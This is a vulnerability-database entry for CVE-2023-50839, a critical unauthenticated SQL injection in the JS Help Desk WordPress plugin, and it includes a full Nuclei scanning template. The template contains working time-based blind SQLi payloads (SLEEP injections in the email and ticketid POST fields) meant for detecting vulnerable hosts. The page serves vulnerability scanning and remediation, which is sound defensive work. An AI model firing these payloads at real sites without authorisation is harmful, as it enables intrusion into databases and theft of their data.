/Vulnerability Library

JS Help Desk <= 2.8.1 - SQL Injection

CVE-2023-50839
Verified

Description

The JS Help Desk – Best Help Desk & Support Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘email' and 'trackingid' parameters in all versions up to 2.8.2 (exclusive) due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

Severity

Critical

CVSS Score

9.8

Exploit Probability

16%

Published Date

February 20, 2026

Template Author

shivam kamboj

CVE-2023-50839.yaml
id: CVE-2023-50839

info:
  name: JS Help Desk <= 2.8.1 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    The JS Help Desk – Best Help Desk & Support Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘email' and 'trackingid' parameters in all versions up to 2.8.2 (exclusive) due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, data tampering, or database compromise.
  remediation: |
    Update to the latest version of JS Help Desk, version 2.8.2 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-50839
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/js-support-ticket/js-help-desk-281-unauthenticated-sql-injection-via-email-and-trackingid
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-50839
    epss-score: 0.16327
    epss-percentile: 0.94941
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,js-support-ticket,unauth

flow: http(1) || http(2)

http:
  - raw:
      - |
        @timeout: 20s
        POST /js-support-ticket-controlpanel/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

        form_request=jssupportticket&jstmod=ticket&task=showticketstatus&email=test@test.com' AND SLEEP(8)-- -&ticketid=test123

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 8'
          - 'status_code == 302'
          - 'len(body) == 0'
          - 'contains(content_type, "text/html")'
        condition: and

  - raw:
      - |
        @timeout: 20s
        POST /js-support-ticket-controlpanel/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

        form_request=jssupportticket&jstmod=ticket&task=showticketstatus&email=test@test.com&ticketid=1'+AND+(SELECT+1+FROM+(SELECT+SLEEP(8))x)--+-

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 8'
          - 'status_code == 302'
          - 'len(body) == 0'
          - 'contains(content_type, "text/html")'
        condition: and
# digest: 4a0a0047304502210090fd980342515f6e5d21503ee023403100c22d62bacb6c4486d9f3361c419f1d022023d8aca8534fa74c65beb61edb78a8620815cc7920c09223dde3e93922474db9:922c64590222798bb761d5b6d8e72950
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2023-50839
CWE ID:
cwe-89

References

https://nvd.nist.gov/vuln/detail/CVE-2023-50839https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/js-support-ticket/js-help-desk-281-unauthenticated-sql-injection-via-email-and-trackingid

Remediation Steps

Update to the latest version of JS Help Desk, version 2.8.2 or later.